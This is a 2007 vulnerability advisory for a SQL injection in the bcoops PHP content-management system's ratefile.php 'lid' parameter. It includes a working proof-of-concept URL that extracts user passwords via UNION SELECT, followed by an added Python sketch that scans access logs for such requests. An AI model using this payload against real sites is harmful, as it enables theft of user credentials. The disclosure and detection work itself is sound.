########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisory: http://lostmon.blogspot.com/2007/11/bcoops-adressesratefilephp-lid-variable.html
vendor notify: NO
exploits available: YES
########################################################

bcoos is a content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the adresses/ratefile.php script not properly sanitizing user-supplied input to the 'lid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time! Try to edit the source code or try another product.

#################
Timeline:
#################

Discovered: 25-11-2007
vendor notify: --------
vendor response: -------
disclosure: 30-11-2007

#################
SQL injections:
#################

http://localhost/bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

####################### €nd ##############################

Thanks to estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
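Since the advisory lists no vendor fix, one thing an operator can do is check web server logs for requests to adresses/ratefile.php whose 'lid' is not a plain integer. The following detection sketch is an added example, not part of the original advisory or of bcoops; the combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path taken from the advisory; "combined" access-log format is assumed.
TARGET = "/modules/adresses/ratefile.php"
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Nov/2007:10:00:01 +0000] "GET /bcoops/modules/adresses/ratefile.php?lid=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/Nov/2007:10:00:09 +0000] "GET /bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 HTTP/1.1" 200 4870',
    '192.0.2.10 - - [30/Nov/2007:10:00:15 +0000] "GET /bcoops/modules/news/index.php?lid=abc HTTP/1.1" 200 900',
]

def suspicious_lid(log_line):
    """Return the decoded lid if the line requests ratefile.php with a lid
    that is not a plain non-negative integer; otherwise return None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(2))
    if not url.path.lower().endswith(TARGET):
        return None
    # parse_qs decodes once; unquote again to catch double-encoded input.
    for value in parse_qs(url.query, keep_blank_values=True).get("lid", []):
        decoded = unquote(value).strip()
        if not re.fullmatch(r"[0-9]+", decoded):
            return decoded
    return None

def flagged_requests(lines):
    """Return (client_ip, decoded_lid) for every suspicious request."""
    hits = []
    for line in lines:
        lid = suspicious_lid(line)
        if lid is not None:
            hits.append((line.split(" ", 1)[0], lid))
    return hits

if __name__ == "__main__":
    for ip, lid in flagged_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric lid to ratefile.php: {lid!r}")
```

The same integer-only rule is what a source-code fix would enforce on 'lid' before it reaches the query.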